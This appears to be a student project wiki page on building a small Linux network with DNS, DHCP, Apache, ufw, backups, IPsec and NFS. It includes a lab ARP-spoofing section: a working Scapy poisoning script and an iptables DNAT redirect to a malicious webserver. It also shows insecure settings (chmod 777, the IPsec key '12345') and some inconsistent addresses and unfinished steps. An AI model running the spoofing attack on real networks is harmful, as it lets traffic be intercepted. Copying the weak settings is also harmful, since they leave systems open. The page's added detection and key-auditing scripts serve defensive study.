User:Tejaswinieswar

Project Objective
The main objective of the Linux project is to build a network implementation for a start-up company. The main components to be implemented in the network are a DNS server to resolve the IP addresses, a DHCP server for assigning IP addresses to the clients and the other components in the network, a domain that is hosted by the webserver, a firewall and a backup server.

Team Members
•	Durga Hari Krishna Yadav Dokkara (dokkara.d@husky.neu.edu)

•	Sri Harshitha Konda (konda.s@husky.neu.edu)

•	Tejaswini Eswar (eswar.t@husky.neu.edu)

•	Yeshwanth Kottu (kottu.y@husky.neu.edu)

Domain Name System
The DNS server resolves hostnames or given domain names to their respective IP addresses. DNS is an application-level protocol that stores DNS records for domain names, such as address records, name server records and mail exchange records. DNS maintains the domain name hierarchy and provides translation between it and the address spaces, whereas a DNS server stores the DNS records for a domain and responds with answers to queries against its database. The DNS protocol can use either TCP or UDP on port number 53.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol operates based on the client-server model. IP addresses are automatically assigned by the DHCP server to the clients in the network, which spares the network administrator or the user from configuring these settings manually on thousands of computers. The DHCP server manages the pool of IP addresses and information about the client configuration parameters such as default gateway, domain name and name servers. DHCP uses UDP on port numbers 67 and 68. A DHCP server may use one of three methods of allocating IP addresses, depending on the implementation.

•Dynamic allocation: This process uses a lease concept with a controllable time period where a network administrator reserves a range of IP addresses and each DHCP client on the LAN is configured to request an IP address from the DHCP server during network initialization. Here the DHCP server can reclaim the IP addresses that are not renewed.

•Automatic allocation: This is similar to the dynamic allocation, but the DHCP server keeps a table of past IP address assignments, so that it can assign the same IP address the client previously had. The DHCP server permanently assigns an IP address to a requesting client from the range defined by the administrator.

•Manual Allocation: This is also known as static allocation. The DHCP server is disabled and the administrator allocates a private IP address based on a preconfigured mapping to each client MAC address.

Webserver
The main function of a webserver is to deliver webpages based on the client request. It is a program that uses HTTP (Hypertext Transfer Protocol) to establish the communication between the client and the server. The most popular webservers used at present are Windows server, Apache webserver and Nginx webservers. In this project, the Apache webserver is used, as it is open source software and is compatible with almost all types of OS.

Firewall
A firewall is a network security system that contains a set of predetermined security rules and monitors and controls the incoming and outgoing network traffic. Firewalls are generally categorized as network-based or host-based. Network-based firewalls are generally present on the network between the internet and the intranet. Host-based firewalls are positioned on the network node itself. Based on our requirements and security needs, our firewall can be configured in such a way that we can block certain packets.

Backup
It is responsible for restoring files, folders, databases in cases of server failure. In case of the server failure, all the files are routed to the backup server.

Algorithm
•	The client and the other servers in the network get their respective IP addresses from the DHCP address pool

•	The client enters the domain name of ‘inhouse.com’ in the web browser

•	A DNS query is sent out to the DNS server looking for the respective IP of inhouse.com

•	If the domain name is valid, the DNS server responds with an answer to the query giving out the IP address

•	If the IP address is not found at the DNS server, an error saying ‘server not found’ will be displayed

•	After getting the IP address, an HTTP request is sent to the webserver

•	If the request is successful, the web browser displays the web page that is hosted on the web server

Algorithm
•	When the DNS query is made, the client computer first searches its local DNS cache, which stores IP addresses resolved in the past.

•	The local DNS server forwards the request to the root DNS server which responds back with the list of TLD (Top Level Domain) servers.

•	The request is forwarded to one of the TLD servers.

•	The TLD server responds with the authoritative DNS server name.

•	The local DNS server sends the request to the authoritative DNS server, which responds with the IP address of the hostname.

DNS Server Configuration
Step 1: Update the packages list and install bind9 server by using apt-get

Command:

sudo apt-get update

sudo apt-get install bind9

Step 2: The file named.conf.options should be configured

Command:

sudo nano /etc/bind/named.conf.options

If the reply for the query is not available in the local DNS server, then the query will be forwarded to the forwarders (DNS servers) as configured below

forwarders {

195.5.5.1;

8.8.8.8;

8.8.4.4;

};

Step 3: Open the file /etc/bind/named.conf.local and add the following contents in the file

Command:

sudo nano /etc/bind/named.conf.local

//

// Do any local configuration here

//

// Consider adding the 1918 zones here, if they are not used in your

// organization

//include "/etc/bind/zones.rfc1918";

#Forward zone

zone "inhouse.com" {

type master;

#masters{195.5.5.12};

allow-transfer{195.5.5.13 ;};

file "/etc/bind/zones/db.inhouse.com";

};

#Reverse zone

zone "5.5.195.in-addr.arpa" {

type master;

#masters{195.5.5.12};

file "/etc/bind/zones/db.195";

allow-transfer{195.5.5.13 ;};

};

#Reverse zone

zone "0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.2.ip6.arpa" {

type master;

#masters{195.5.5.12};

file "/etc/bind/zones/db.195";

allow-transfer{195.5.5.13 ;};

};

Step 4: create zone files

Command:

sudo nano /etc/bind/zones/db.inhouse.com

;
; BIND data file for local loopback interface
;
$TTL	604800
@	IN	SOA	inhouse.com. admin.inhouse.com. (
			2		; Serial
			604800		; Refresh
			86400		; Retry
			2419200		; Expire
			604800 )	; Negative Cache TTL
;
@	IN	NS	ns.inhouse.com.
@	IN	NS	ns1.inhouse.com.
@	IN	AAAA	2001::7
ns.inhouse.com.	IN	A	195.5.5.12
ns1.inhouse.com.	IN	A	195.5.5.13
lmsq.inhouse.com.	IN	A	195.5.5.14
;
macbook	IN	CNAME	lmsq.inhouse.com.
www	IN	A	195.5.5.14
www	IN	AAAA	2001::7

sudo nano /etc/bind/zones/db.195

;

; BIND reverse data file for local loopback interface

;

$TTL	604800

@	IN	SOA	inhouse.com. admin.inhouse.com. (
			2		; Serial
			604800		; Refresh
			86400		; Retry
			2419200		; Expire
			604800 )	; Negative Cache TTL
;

@	IN	NS	inhouse.com.

13	IN	PTR	ns1.inhouse.com.

12	IN	PTR	ns.inhouse.com.

14	IN	PTR	www.inhouse.com.

@	IN	NS	ns.inhouse.com.

7.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0	IN	PTR	www.inhouse.com.

Step 5: To restart the DNS master:

Command:

sudo /etc/init.d/bind9 restart

DNS Slave Configuration:

Step 1:

Command:

sudo nano /etc/bind/named.conf.local

Algorithm
•	When a client is connected to a network, it broadcasts a DHCP discover message within its subnet.

•	The DHCP server, after receiving this message, responds with a unicast offer message to the client.

•	The client accepts the offer message and requests the DHCP server for an IP address.

•	The server responds back with the IP address

DHCPv4
Step 1: To update the available packages and install DHCP server

Command:

sudo apt-get update

sudo apt install isc-dhcp-server

Step 2: In order to configure the DHCP server, edit the following file

Command:

sudo nano /etc/dhcp/dhcpd.conf

In the file, make the following changes

subnet 195.5.5.0 netmask 255.255.255.0 {

range 195.5.5.21 195.5.5.254;

default-lease-time 600;

max-lease-time 7200;

option subnet-mask 255.255.255.0;

option broadcast-address 195.5.5.255;

option domain-name-servers 195.5.5.12, 195.5.5.13;

option routers 195.5.5.1;

}

DHCPv6
Step 1:

Command:

sudo nano /etc/dhcp/dhcpd6.conf

default-lease-time 600;

max-lease-time 7200;

log-facility local7;

subnet6 2001::/64 {

range6 2001::21 2001::50;

}

Step 2:

Command:

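sudo nano /etc/apparmor.d/usr.sbin.dhcpd

Add the following line after the line network inet raw,

network inet6 raw,

Step 3: Now restart AppArmor and make the following changes in the file

Command:

sudo /etc/init.d/apparmor restart

sudo nano /etc/default/isc-dhcp-server

Add the following lines

OPTIONS="-6"

INTERFACES="ens33"

Then set the permissions on the DHCPv6 configuration file. Mode 777 leaves the server configuration writable by every local user; dhcpd only needs to read it, so 644 is sufficient.

chmod 777 /etc/dhcp/dhcpd6.conf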

Step 4: To restart the DHCP server:

Command:

sudo service isc-dhcp-server restart

sudo service isc-dhcp-server6 restart

Step 5: In order to check the status of DHCP server:

Command:

sudo systemctl status isc-dhcp-server

sudo systemctl status isc-dhcp-server6

Step 6: To check the systemd logs:

Command:

journalctl -xe

Step 7: Assign a static IP to the DHCP server and make the following changes in the file:

Command:

sudo nano /etc/network/interfaces

auto lo

iface lo inet loopback

auto ens33

iface ens33 inet static

address 195.5.5.11

netmask 255.255.255.0

broadcast 195.5.5.255

gateway 195.5.5.1

network 195.5.5.0

dns-nameservers 195.5.5.12 195.5.5.13

iface ens33 inet6 static

address 2001::11

netmask 64

gateway 2001::1

DHCP Client Configuration
Step 1: Go to the dhcp folder in /etc

Command:

cd /etc/dhcp

add the following lines in the files

auto ens33

iface ens33 inet dhcp

Step 2: The IPv6 client DUID can be found in

Command:

sudo cat /var/lib/dhcp/dhcpclient.leases

Step 3: To restart DHCP client

Command:

sudo /etc/init.d/networking restart

Algorithm of Webserver
•	The client obtains server IP address from DNS server.

•	Client initiates TCP connection by sending SYN message on port 80 of the server.

•	Server responds with SYN-ACK message to the client and allows it to request the information.

•	Client responds back with the ACK message completing the three-way handshake.

•	Then the client requests for the desired HTML page

Webserver Configuration
Step 1: Install the Apache2 server by using apt-get

Command:

sudo apt-get update

sudo apt-get install apache2

If the IP address of 127.0.0.1 is entered in web browser, then the default apache2 page should be displayed. This shows that the apache2 web server is successfully installed.

Step 2: To allow other clients on the network to access our hosted webpage, the web pages have to be placed under /var/www/, so we create a directory for our domain inhouse.com under /var/www

Command:

sudo mkdir -p /var/www/inhouse.com/htmlfiles

Step 3: As the directories are not in the root directories, we should grant other clients permission to access the files

Command:

sudo chown -R $USER:$USER /var/www/inhouse.com/htmlfiles

sudo chmod -R 755 /var/www

Step 4: Create an HTML file for your website using nano or gedit

Command:

sudo nano /var/www/inhouse.com/htmlfiles/index.html

Step 5: Configure Apache2 000-default.conf

ServerAdmin webserver@localhost

ServerName inhouse.com

DocumentRoot /var/www/inhouse.com/htmlfiles

Step 6: Restart the webserver

Command:

sudo service apache2 restart

Step 7: Set up the local hosts file (/etc/hosts)

Command:

sudo nano /etc/hosts

127.0.0.1 localhost

127.0.1.1 ubuntu

195.5.5.14 inhouse.com

Packages Used
•	ufw

Configuration
Step 1: install ufw by using the following command

Command:

sudo apt-get install ufw

Step 2: To allow or deny the access based on the requirement

Command:

Deny access to POP3 from any:

sudo ufw deny 110

Allow telnet and ssh access from the server:

sudo ufw allow proto tcp from 195.5.5.14 to any port 22

sudo ufw allow proto tcp from 195.5.5.14 to any port 23

Deny access of ssh and telnet to 195.5.5.14:

sudo ufw deny proto tcp from any to 195.5.5.14 port 22

sudo ufw deny proto tcp from any to 195.5.5.14 port 23

Deny access of FTP to 195.5.5.14:

sudo ufw deny proto tcp from any to 195.5.5.14 port 21

sudo ufw deny proto tcp from any to 195.5.5.14 port 20

To allow NFS:

sudo ufw allow 111

To allow DHCP ports in the firewall:

sudo ufw allow 68

sudo ufw allow 67

To enable the firewall:

sudo ufw enable

To check the status of the firewall:

sudo ufw status

To test the status of the firewall:

sudo ufw status verbose

Backup
The desired documents are tarred and the archive file is created on the backup server using SSH.

Configuration Steps for Backup Client:
Step 1: Install SSH server

Command:

sudo apt install openssh-server

Step 2: To give access to the folder

Command:

chmod -R 775 /opt

Configuration Steps for Backup Server:
The SSH client is installed by default on all the clients.

Step 1: To write the shell script

Command:

nano /opt/backup.sh

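# Timestamp (seconds since the epoch) keeps each archive name unique
day=$(date +%s)

file="Inhouse.com-$day.tgz"

# Stream the web root as a gzipped tar over SSH and write it on the backup server
tar zcvf - -C /var/www/inhouse.com . | ssh harshi@195.5.5.15 "cat - > /opt/$file"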

Step 2: To perform the SSH login without a password, an SSH key has to be generated. To generate the SSH key:

Command:

ssh-keygen

Step 3: To exchange the key with the backup server:

Command:

ssh-copy-id harshi@195.5.5.15

Enter the password for the user name harshi in 195.5.5.15

Step 4: In order to automate the backup, a cron job should be set up

Command:

crontab -e

Step 5: Add the following line in the crontab to specify when the backup should happen. In our project, the configuration is made in such a way that the backup happens every 30 minutes

Command:

*/30 * * * * bash /opt/backup.sh

In the same way, back up the DNS Master (/etc/bind) and the DHCP Server (/etc/dhcp) configurations to the backup server.

ARP Spoofing
ARP spoofing is a technique in which an attacker sends ARP messages onto a Local Area Network. Here the attacker associates his MAC address with the IP address of another host. As a result, traffic that is meant for that host's IP address is forwarded to the attacker instead. Scapy is a powerful interactive packet manipulation program in Python. It is used to forge packets. In our case, to perform ARP poisoning we forge the ARP packet, send it to the client and so forge the client's ARP table.

Step 1: Install the Python module Scapy

Command:

pip install scapy

Step 2: create a python script and add the following content

Command:

sudo nano /opt/arpspoofing.py

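from scapy.all import *

# ARP packet that claims the webserver's IP (psrc) and is addressed to the client (pdst)
p = ARP()

p.psrc = "195.5.5.14"

p.pdst = "195.5.5.25"

# Keep resending so the entry in the client's ARP table stays overwritten
while True:

    send(p, verbose=0)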

Step 3: Execute the python script using the following

Command:

python arpspoofing.py

This script spoofs the MAC address of the webserver on the client’s machine.

Now we can see that the MAC address of the malicious client is recorded in the client's ARP table for the webserver. When the client requests 195.5.5.14 through the web browser, the packet reaches the malicious client, because the client's ARP table holds the malicious client’s MAC address. But when the packet reaches layer 3, it gets dropped, because the destination IP in the packet is the webserver IP. So in order to deliver the packet to the malicious client's webserver, the destination IP of the packet has to be rewritten.

Command: arp -a

In order to change the IP we use destination NAT with netfilter at PREROUTING.

Command: iptables -t nat -A PREROUTING -p tcp -d 10.10.20.99 --dport 80 -j DNAT --to-destination 10.10.14.2

In the client, enter the domain inhouse.com and it will be redirected to the malicious client's webserver, and you will see a hacked webpage.
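The change that `arp -a` shows on the client is also what a defender can watch for. The following is an added example, not part of the original project: it parses `arp -a` output and flags an IP whose MAC differs from a recorded known-good value, or a MAC that answers for more than one IP. The MAC addresses, the host 195.5.5.30 and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches Linux `arp -a` lines such as
# "? (195.5.5.14) at 00:0c:29:11:22:14 [ether] on ens33"
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

# Constructed sample data: MACs recorded while the network was known to be clean.
PINNED = {"195.5.5.1": "00:0c:29:11:22:01", "195.5.5.14": "00:0c:29:11:22:14"}

SNAPSHOT_BEFORE = """\
? (195.5.5.1) at 00:0c:29:11:22:01 [ether] on ens33
? (195.5.5.14) at 00:0c:29:11:22:14 [ether] on ens33
? (195.5.5.30) at 00:0c:29:de:ad:30 [ether] on ens33
? (195.5.5.40) at <incomplete> on ens33
"""

SNAPSHOT_AFTER = """\
? (195.5.5.1) at 00:0c:29:11:22:01 [ether] on ens33
? (195.5.5.14) at 00:0c:29:de:ad:30 [ether] on ens33
? (195.5.5.30) at 00:0c:29:de:ad:30 [ether] on ens33
"""

def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output; unresolved entries are skipped."""
    return {m["ip"]: m["mac"].lower() for m in ARP_LINE.finditer(text)}

def audit(table, pinned):
    """Return findings as (kind, ip(s), mac) tuples."""
    findings = []
    # 1. An IP with a recorded MAC now resolves to a different MAC.
    for ip, mac in sorted(table.items()):
        expected = pinned.get(ip)
        if expected and mac != expected.lower():
            findings.append(("pinned-mismatch", ip, mac))
    # 2. One MAC answers for several IPs (the spoofer's own IP plus the victim's).
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("shared-mac", ",".join(sorted(ips)), mac))
    return findings

if __name__ == "__main__":
    for name, snap in (("before", SNAPSHOT_BEFORE), ("after", SNAPSHOT_AFTER)):
        print(name, audit(parse_arp_table(snap), PINNED))
```

A host whose address must not move, such as the webserver, can also be given a static entry on the clients with `arp -s`, so that received ARP messages cannot overwrite it.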

IP Sec
An IPsec tunnel creates a virtual private network between 2 Linux machines. It uses the IPsec protocol. Here data security is provided in various ways, such as authentication and encryption of data and protection against manipulation. IP sec uses RSA for internet key exchange.

Step 1: Install strongSwan starter

Command:

sudo apt-get install strongswan-starter

Create a file /etc/ipsec.conf and make the following changes

sudo nano /etc/ipsec.conf

conn VM1_VM2
    authby=secret
    auto=route
    keyexchange=ike
    left=195.5.5.12
    right=195.5.5.13
    type=tunnel
    esp=aes128gcm16!

Step 2: Create a file /etc/ipsec.secrets

Command:

sudo nano /etc/ipsec.secrets

195.5.5.13 195.5.5.12 : PSK "12345"

Step 3: Similarly configure these steps in the other client

Step 4: Restart ipsec on both the clients and test the status using following command

Command:

sudo ipsec restart

sudo ipsec status

Step 5: Testing:

Command:

sudo watch ipsec statusall
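With authby=secret, the tunnel is only as strong as the pre-shared key in /etc/ipsec.secrets, and "12345" is far weaker than the AES-128 cipher configured for ESP. The following is an added example, not part of the original project: it audits the PSK lines of an ipsec.secrets file and generates a replacement line. The 128-bit threshold, the sample hex secret, the IPv6 selectors and the function names are assumptions made for illustration.

```python
import math
import re
import secrets

# "<selectors> : PSK <secret>"; the lazy match keeps IPv6 selectors such as 2001::12 intact.
PSK_LINE = re.compile(r'^(?P<sel>.*?)\s*:\s+PSK\s+(?P<secret>"[^"]*"|\S+)', re.IGNORECASE)

# Constructed sample; line 2 is the entry from Step 2, line 3 is a made-up hex secret.
SAMPLE = '''# /etc/ipsec.secrets
195.5.5.13 195.5.5.12 : PSK "12345"
2001::12 2001::13 : PSK 0x00112233445566778899aabbccddeeff
'''

def secret_bits(token):
    """Upper bound on the entropy of a PSK token in bits (length x alphabet size)."""
    if token[:2].lower() == "0x":            # hexadecimal secret: 4 bits per digit
        return 4 * len(token[2:])
    if token[:2] == "0s":                     # Base64 secret: 6 bits per character
        return 6 * len(token[2:].rstrip("="))
    text = token.strip('"')                   # quoted string: estimate from character classes
    classes = ((r"[a-z]", 26), (r"[A-Z]", 26), (r"[0-9]", 10), (r"[^a-zA-Z0-9]", 32))
    pool = sum(size for pattern, size in classes if re.search(pattern, text))
    return len(text) * math.log2(pool) if pool else 0

def audit_secrets(text, min_bits=128):
    """Return (line number, selectors, bits, ok) for every PSK entry in the file text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = PSK_LINE.match(line)
        if m:
            bits = math.floor(secret_bits(m["secret"]))
            findings.append((lineno, m["sel"].strip(), bits, bits >= min_bits))
    return findings

def new_psk_line(left, right):
    """Build an ipsec.secrets line with 256 random bits from the OS CSPRNG."""
    return f'{left} {right} : PSK "{secrets.token_urlsafe(32)}"'

if __name__ == "__main__":
    for finding in audit_secrets(SAMPLE):
        print(finding)
    print(new_psk_line("195.5.5.12", "195.5.5.13"))
```

The bit count is only an upper bound derived from length and alphabet, so a passing value does not prove a secret is random; generate the key rather than choosing it, and install the same line on both peers.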

NFS
Installing NFS server:

Step 1: Install the NFS server

Command:

apt-get install nfs-kernel-server

Step 2: Edit the file /etc/exports and add the following line

Command:

nano /etc/exports

/opt 195.5.5.0/255.255.255.0(rw,sync,subtree_check,root_squash)

Step 3: Restart the NFS server:

Command:

/etc/init.d/nfs-kernel-server restart

Step 4: To check the exported folder.

Command:

exportfs -rv

NFS client:

apt install nfs-common

chmod -R 777 /opt/mnt

nano /etc/fstab

add the following line

mount -a (in order to mount the folders of nfs server in the client)

Future Improvements
•	IPv6 tunnels can be implemented

•	We can implement proxy servers in front of the webserver to implement security where only a particular group of clients can access it

•	DNS security can be implemented to prevent DDoS

Conclusion
A network containing a DNS server, a DHCP server and a webserver is created such that the client can access the webpage. The network is secured by the firewall, and redundancy is added by configuring a backup server.